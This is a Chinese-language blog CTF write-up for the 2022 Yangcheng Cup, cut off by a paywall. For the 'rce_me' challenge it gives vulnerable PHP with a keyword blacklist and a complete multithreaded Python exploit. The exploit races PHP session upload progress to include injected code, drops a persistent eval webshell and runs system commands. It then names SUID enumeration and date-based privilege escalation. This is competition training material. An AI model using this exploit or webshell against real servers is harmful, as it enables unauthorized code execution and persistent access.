2022年羊城杯wp

最新推荐文章于 2024-01-22 09:03:08 发布
最新推荐文章于 2024-01-22 09:03:08 发布
阅读量1.7k 收藏 13
点赞数 2
分类专栏: CTF 文章标签: php python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xjh8023/article/details/126688058
版权

web

rce_me

<?php
(empty($_GET["file"])) ? highlight_file(__FILE__) : $file=$_GET["file"];
function fliter($var): bool{
   
     $blacklist = ["<","?","$","[","]",";","eval",">","@","_","create","install","pear"];
         foreach($blacklist as $blackword){
   
           if(stristr($var, $blackword)) return False;
    }
    return True;
}  
if(fliter($_SERVER["QUERY_STRING"]))
{
   
include $file;
}
else
{
   
die("Noooo0");
}

获取webshell,题目中过滤了很多字符,但是可以利用echo写shell,参考链接
https://blog.csdn.net/chizhaji/article/details/113521985?spm=1001.2101.3001.6661.1&utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-113521985-blog-111184583.pc_relevant_multi_platform_whitelistv4&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-113521985-blog-111184583.pc_relevant_multi_platform_whitelistv4&utm_relevant_index=1
发现需要同时发包,利用脚本也可以直接发包

# coding=utf-8
import io
import requests
import threading

sessid = 'flag'
data = {
   "cmd": "system('cat f*');"}
url = "http://80.endpoint-9588ad86d7e34833b12f992204ec90da.dasc.buuoj.cn:81/"

def write(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post(url,
                            data={
   "PHP_SESSION_UPLOAD_PROGRESS":"<?php eval($_POST[cmd]);fputs(fopen('a.php','w'),'<?php @eval($_POST[wa1ki0g])?>');?>"},
                            files={
   'file': ('tgao.txt', f)}, cookies={
   'PHPSESSID': sessid})

def read(session):
    while True:
        resp = session.post(url+'?file=/tmp/sess_' + sessid,
                            data=data)
        if 'tgao.txt' in resp.text:
            print(resp.text)
            event.clear()
        else:
            pass

if __name__ == "__main__":
    event = threading.Event()
    with requests.session() as session:
        for i in range(1, 30):
            threading.Thread(target=write, args=(session,)).start()

        for i in range(1, 30):
            threading.Thread(target=read, args=(session,)).start()
    event.set()

在这里插入图片描述脚本会响应10秒左右报错。但是shell上传成功
在这里插入图片描述在这里插入图片描述读取不到flag,需要提权
内核是Linux,考虑suid提权
在这里插入图片描述find / -perm -u=s -type f 2>/dev/null
在这里插入图片描述利用date来提权
在这里插入图片描述获取flag
在这里插入图片描述

step_by_step-v3

<?php
error_reporting(0);
class yang
{
   
    public $y1;
    public function __construct()
    {
   
        $this->y1->magic();
    }
    public function __tostring()
    {
   
        ($this->y1)();
    }
    public function hint()
    {
   
        include_once('hint.php');
        if(isset($_GET['file']))
        {
   
            $file = $_GET['file']
最低0.47元/天 解锁文章
NilnG
关注
  • 2
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2020YCBCTF:2020羊城官方writeup及
03-24
2020 2020羊城官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
2023羊城 DASCTF EZ-Misc
09-03
2023羊城 DASCTF EZ-Misc
2022羊城密码wp
mxx307的博客
09-04 995
2022羊城密码wp
羊城2022 部分web
weixin_43610673的博客
09-05 817
pearcmd.php文件包含,过滤了常用的几个命令选项,但还有个download。写个马丢到vps上,pear的过滤使用url编码绕过。
2023羊城”网络安全大赛 Web方向题解wp
Jay17的博客
09-03 4939
2023羊城”网络安全大赛 Web方向题解wp
2022羊城pwn wp
N1rvana的博客
09-04 861
2022羊城pwn
BUUCTF [羊城 2020]easyre 题解
OrientalGlass的博客
03-08 973
对数字和字母移三位,其他特殊字符不变,要求出加密前的字符串,只需要对数字+7再mod10,对字母+23再mod26,有点补码的感觉在。看到主函数的str2大概就可以猜到是base64,ctrl+f12也可以看到存在base64表。进入该函数后大概看一下不难发现是base64加密并且这题没有换表操作。第三次加密是将code2内的数字和字母移3位,其他字符不变。第一次加密是base64加密,得到code1。三.encode_one_base64。五.encode_three。四.encode_two。
2023 羊城 final
11-21
附件
专题资料(2021-2022)《羊城地铁报》读者卡商户调查问卷.doc
10-07
教育资料
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
05-27
整合rmi和ldap服务器+恶意类,使用方法: $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] where: -C - command executed in the remote classfile. (optional , default command is "open /Applications/Calculator.app") -A - the address of your server, maybe an IP address or a domain. (optional , default address is the first network interface address)
风二西CTF流量题大集合-刷题笔记|NSSCTF流量题(2)
最新发布
zerorzeror的博客
01-22 625
提交发现,07ab403ab740c1540c378b0f5aaa4087正确值。
[羊城 2020]Power wp 2021/9/22
qq_52193383的博客
09-22 1308
[羊城 2020]Power 题目 from Crypto.Util.number import * import gmpy2 from secret import flag p = getPrime(512) q = getPrime(512) n = p**4*q e = 0x10001 phi = gmpy2.lcm(p - 1, q - 1) d = gmpy2.invert(e, phi) dp = d % (p - 1) m = bytes_to_long(flag) c = pow(m,
CTF逆向-[羊城 2020]Bytecode-WP-Python字节码反编译
serfend's blog
04-12 2722
CTF逆向-[羊城 2020]Bytecode-WP-Python字节码反编译 来源:https://buuoj.cn/ 内容:无 附件:https://pan.baidu.com/s/15XJLq9jFV_pOtPMzNXG9XA?pwd=tlwo 提取码:tlwo 答案:GWHT{cfa2b87b3f746a8f0ac5c5963faeff73} 总体思路 反编译汇编成py源码 检查源码逻辑发现是一个约束求解(解方程) 使用z3输入条件得到flag 详细步骤 文件信息,打开发现是Python
2021羊城Web-wp
weixin_45805993的博客
09-12 535
0x01涉及考点 laravel debug cve (CVE-2021-3129) ftp-redis打ssrf 0x02题目分析 扫目录发现一个文件中开启了6379端口和redis的dmp文件,推测要用redis来ssrf 之后了解了CVE-2021-3129 https://xz.aliyun.com/t/9030 大致是Ignition默认提供的vendor/facade/ignition/src/Solutions/MakeViewVariableOptionalSolution.php中可控f
[羊城 2020]Bytecode [UTCTF2020]babymips
寻梦&之璐
05-30 1137
文章目录查看题目python代码Z3约束脚本 查看题目 python字节码,需要把它转为python代码,如下: python代码 import dis def main(): en=[3,37,72,9,6,132] output=[101,96,23,68,112,42,107,62,96,53,176,179,98,53,67,29,41,120,60,106,51,101,178,189,101,48] print("welcome to GWHT2020") f
2020羊城」网络安全大赛 Re部分 WriteUp
qq_42436176的博客
09-11 2112
Re login 使用PyInstaller Extractor v2.0把exe进行解包, 在解包指令中发现Python version: 36, 切换到python3.6环境中 可以看见入口文件为login.pyc, 使用uncompyle6 login.pyc解析pyc文件 看到一堆数字, 嗯, 又是方程组, 上z3 from z3 import * a1, a2, a3, a4, a5, a6, a7, a8, a9, a10, a11, a12, a13, a14 = Ints("a1 a2 a
第三届南宁市网络安全技术大赛部分wp
谭宇
12-16 235
1、shamir重要数据损坏(Crypto) 题干 shamir典型门限秘密共享,要形成(3,5)门限,则产生一个二次多项式 根据题目获得对应的三组(f(x),x)轻易的解出方程。 a = 5,b = 23, M = 2018 而M就为加密的信息,flag为2018提交成功。 2、misc2(MISC) 题干 ...
2021羊城”网络安全大赛部分Writeup
qq_42815161的博客
09-13 8263
MISC 签到 题目描述:猜数字01-30,数字序列以Sanfor{md5(**-**-**-**)}形式提交 附件为一张gif 猛猜 图1 28准则 图2 8卦阵 图3 30而立之 图4 北斗7星 图5 4大才子 图6 歼-20 图7 2只黄鹂鸣翠柳 图8 17来看流星雨 图9 23号乔丹 图10 1马当先 图11 12黄道 图12 新闻联播每晚19点首播 得到序列 md5(28-08-30-07-04-20-02-17-23-01-12-19) #SangFor{d93b7d..
羊城2020 wp
08-18
羊城2020是一场度的电子竞技赛事,为广大电竞爱好者提供了一个展示技术和激发激情的舞台。今羊城聚集了来自全国各地的顶尖电竞选手,他们在各个游戏项目中展现了高水平的操作和战术。 在比赛的文化氛围方面,羊城2020鼓励团队协作和竞争精神,这对于参赛选手来说是一个很好的机会展现自己的技术能力和团队合作能力。此外,组委会还积极倡导公平竞赛,严禁使用任何形式的作弊或不正当手段来获取胜利,从而保证了比赛的公正性。 羊城2020不仅是一场竞技比赛,还提供了丰厚的奖金和荣誉,吸引了众多顶尖选手参与其中。参赛选手们通过紧张刺激的比赛,展现了他们的技术实力和战术策略。同时,比赛也为电竞爱好者们提供了一个观赏比赛和学习经验的机会,让他们更好地了解电竞运动,提高自己的技术水平。 此外,羊城2020还注重了普及电竞文化的意义。比赛在各个媒体平台上进行直播,使更多的观众能够通过网络或电视观看比赛,增加了电竞的曝光度。通过各种推广活动,羊城2020吸引了更多非电竞爱好者的关注,提高了电竞在社会中的认可度和影响力。 总的来说,羊城2020是一场令人期待的电竞盛事,它不仅展示了顶尖选手们的实力和技巧,也推广了电竞文化并吸引了更多人的关注。这样的比赛将继续推动电竞行业的发展和壮大,为电竞爱好者们带来更多的精彩赛事和娱乐体验。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值